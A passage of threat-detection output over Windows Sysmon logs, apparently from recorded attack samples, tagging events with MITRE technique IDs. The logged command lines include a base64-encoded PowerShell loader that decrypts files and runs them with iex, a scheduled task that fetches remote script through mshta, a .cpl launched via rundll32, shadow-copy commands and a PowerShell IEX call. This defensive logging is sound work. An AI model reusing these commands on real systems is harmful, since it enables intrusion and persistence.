PQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558969968.76308,2019-05-27T19:12:48.763080+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c vssadmin List Shadows| find "Shadow Copy Volume" ),1," 1 5 4 1 0 0x8000000000000000 6184 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:48.644 365ABB72-FE70-5CEB-0000-0010385C0C00 2412 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c vssadmin List Shadows| find "Shadow Copy Volume" C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-FD85-5CEB-0000-00104C0E0B00 1944 C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1564436001.567754,2019-07-30T01:33:21.567754+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 93.184.220.29 ) and port ( 80 )",3," 3 5 4 3 0 0x8000000000000000 4908 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Suspicious NetCon 2019-07-29 21:33:19.687 747F3D96-661E-5D3F-0000-00107F248700 3164 C:\Windows\System32\mshta.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10.home 49827 false 93.184.220.29 80 http ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",)",1," 1 5 4 1 0 0x8000000000000000 4863 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:11:17.445 747F3D96-60F5-5D3F-0000-0010D1CF5500 4356 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", C:\Users\IEUser\Downloads\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-0020B5314100 0x4131b5 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-60F5-5D3F-0000-0010A7B65500 4996 C:\Windows\System32\control.exe "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl", ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1127] Trusted Developer Utilities,1558632368.94719,2019-05-23T21:26:08.947190+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( \\vboxsrv\HTools\msxsl.exe ) through command line ( msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat) ,1," 1 5 4 1 0 0x8000000000000000 1017 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-23 17:26:08.686 365ABB72-D7B0-5CE6-0000-001077C56D00 3388 \\vboxsrv\HTools\msxsl.exe 1.1.0.1 msxsl Command Line XSLT Microsoft msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat D:\ IEWIN7\IEUser 365ABB72-CE6C-5CE6-0000-002047F30000 0xf347 1 High SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8 365ABB72-D2D4-5CE6-0000-001047EA6400 2236 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1599760127.156198,2020-09-10T21:48:47.156198+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 380456 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 - 2020-09-10 17:48:39.678 747F3D96-66F7-5F5A-0500-00000000F600 388 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe c:\windows\system32\cmd.exe c:\windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-66F8-5F5A-E703-000000000000 0x3e7 0 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-66F4-5F5A-0300-00000000F600 300 C:\Windows\System32\smss.exe \SystemRoot\System32\smss.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," 1 5 4 1 0 0x8000000000000000 4863 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:11:17.445 747F3D96-60F5-5D3F-0000-0010D1CF5500 4356 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", C:\Users\IEUser\Downloads\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-0020B5314100 0x4131b5 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-60F5-5D3F-0000-0010A7B65500 4996 C:\Windows\System32\control.exe "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl", ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," 1 5 4 1 0 0x8000000000000000 4863 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:11:17.445 747F3D96-60F5-5D3F-0000-0010D1CF5500 4356 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", C:\Users\IEUser\Downloads\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-0020B5314100 0x4131b5 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-60F5-5D3F-0000-0010A7B65500 4996 C:\Windows\System32\control.exe "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl", ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557681631.183699,2019-05-12T21:20:31.183699+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 16511 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 17:20:01.964 365ABB72-55C1-5CD8-0000-0010970D2F00 4092 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-4FB5-5CD8-0000-0020F2350100 0x135f2 1 Medium SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-502E-5CD8-0000-00102A330700 3192 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe)",1," 1 5 4 1 0 0x8000000000000000 16390 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:32:58.167 365ABB72-208A-5CD8-0000-0010119B2400 3560 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2006-5CD8-0000-0010E0912300 2936 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1," 1 5 4 1 0 0x8000000000000000 16390 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:32:58.167 365ABB72-208A-5CD8-0000-0010119B2400 3560 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2006-5CD8-0000-0010E0912300 2936 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920558.893033,2019-05-27T05:29:18.893033+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:userName ),1," 1 5 4 1 0 0x8000000000000000 5940 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:18.852 365ABB72-3D6E-5CEB-0000-00102FAAFF00 3304 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:userName C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1," 1 5 4 1 0 0x8000000000000000 16390 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:32:58.167 365ABB72-208A-5CD8-0000-0010119B2400 3560 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2006-5CD8-0000-0010E0912300 2936 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558497731.307031,2019-05-22T08:02:11.307031+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 839 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-22 04:02:11.287 365ABB72-C9C3-5CE4-0000-00101F422E00 2888 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-C32E-5CE4-0000-00205DF00000 0xf05d 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-C9C1-5CE4-0000-00100B222E00 3156 C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1600 CREDAT:275470 /prefetch:2 ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1558969968.655114,2019-05-27T19:12:48.655114+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1," 1 5 4 1 0 0x8000000000000000 6182 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:47.456 365ABB72-FE6F-5CEB-0000-0010D33A0C00 3344 C:\Windows\System32\wbem\WMIC.exe 6.1.7600.16385 (win7_rtm.090713-1255) WMI Commandline Utility Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 365ABB72-FE6F-5CEB-0000-0010F4370C00 3448 C:\Windows\System32\cmd.exe cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" ",IEWIN7,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1564436000.711201,2019-07-30T01:33:20.711201+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," 3 5 4 3 0 0x8000000000000000 4907 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Suspicious NetCon 2019-07-29 21:33:19.556 747F3D96-661E-5D3F-0000-00107F248700 3164 C:\Windows\System32\mshta.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10.home 49826 false 151.101.0.133 443 https ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1558452779.809883,2019-05-21T19:32:59.809883+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR "mshta.exe https://hotelesms.com/Injection.txt" /F ),1," 1 5 4 1 0 0x8000000000000000 4129 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-21 15:32:59.729 365ABB72-1A2B-5CE4-0000-00102F502201 3772 C:\Windows\System32\schtasks.exe 6.1.7600.16385 (win7_rtm.090713-1255) Manages scheduled tasks Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR "mshta.exe https://hotelesms.com/Injection.txt" /F C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-39CC-5CE3-0000-002096C70000 0xc796 1 High SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 365ABB72-1A29-5CE4-0000-001079F92101 2432 C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," 1 5 4 1 0 0x8000000000000000 10154 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 22:52:27.588 365ABB72-D1AB-5CC8-0000-0010DB1E4400 1372 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami C:\Windows\system32\ IEWIN7\IEUser 365ABB72-C494-5CC8-0000-0020E4FF0000 0xffe4 1 High SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-D0E5-5CC8-0000-0010DADF3E00 2892 C:\Windows\System32\cmd.exe cmd ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX 